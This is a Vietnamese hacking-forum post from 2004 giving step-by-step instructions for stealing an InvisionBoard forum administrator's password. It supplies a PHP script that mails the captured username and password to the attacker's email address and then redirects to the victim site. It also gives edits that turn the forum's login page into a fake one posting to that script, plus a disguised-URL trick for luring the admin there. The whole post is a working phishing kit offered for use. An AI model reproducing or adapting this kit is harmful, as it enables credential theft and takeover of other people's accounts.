PDA

View Full Version : hack pass admin trong IBF


kingasawa
18-02-2004, 10:05
Only InvisionBoard Forum .. các forum khác làm cũng tương tự

Thực ra cách này cũng đơn giản như cách làm fake login trong yahoo ..tuy nhiên để làm fake login trong forum phải wa bước sữ source ... kingasawa đã nghiên cứu kĩ và hôm nay đưa ra bài hướng dẫn để chia sẽ với các bạn ..

Chuẩn Bị :

Bạn chuẩn bị file kingasawa.php với source như sau :


<?
$contactemail = "kingasawa@yahoo.com"; //
$subject = "password of user";
$message = " $passwd la pass cua $user";
mail($contactemail, $subject, $message);
header("location: http://victim.com");
?>

$contactemail và location bạn phải sửa lại cho phù hợp với nhu cầu của bạn ..

Bước tiếp theo nào ... bạn mở forum của victim lên ( forum mà bạn muốn lấy pass của admin ) --> vào phần login --> viewsource ...
và chúng ta bắt đầu sửa source của nó để làm 1 trang fake login forum

Bạn kiếm dòng :

<body background='style_images/1/' leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" alink='#000000' vlink='#000000'>

Thêm vào sau nó :

<FORM name=LOGIN action="kingasawa.php" method="post" autocomplete="off">

Tiếp tục tìm :

function ValidateForm() {
var Check = 0;

Thêm vào bên dưới :

var passwd = form.LOGIN.passwd.value;
var user = form.LOGIN.user.value;

Tìm :

if (document.LOGIN.UserName.value == '') { Check = 1; }
if (document.LOGIN.PassWord.value == '') { Check = 1; }

Thay đoạn đó bằng đoạn sau :

if (document.LOGIN.user.value == '') { Check = 1; }
if (document.LOGIN.passwd.value == '') { Check = 1; }

Tìm dòng :

name='UserName'

thay bằng :

name='user'

tưong tự thay :

name='PassWord'

thành :

name='passwd'

Như vậy là xong được bước sữa source cũng là bước khó nhất ..

Bước này bạn phải làm sao dụ thằng admin vào ngay cái trang login giả của forum nó .. có 1 cách ...



<a href="http://www.yahoo.com%00@kingasawa.com/forum">Go To Yahoo Mail</a>

bạn thấy đoạn code đó ko .. bạn có hiểu bản chất của đoạn code này hay ko ... hãy mở 1 trình soạn thảo ... và xài thử đoạn code đó bạn sẽ hiểu công dụng .. và bạn sẽ biết làm cách nào để dụ thằng admin vào ngay cái trang login giả để đăng nhập pass .. và pass của nó dĩ nhiên nằm trong tay bạn

[Copyright by kingasawa]mọi thắc mắc có thể liên hệ Y!M kingasawa or forum http://kingasawa.com/forum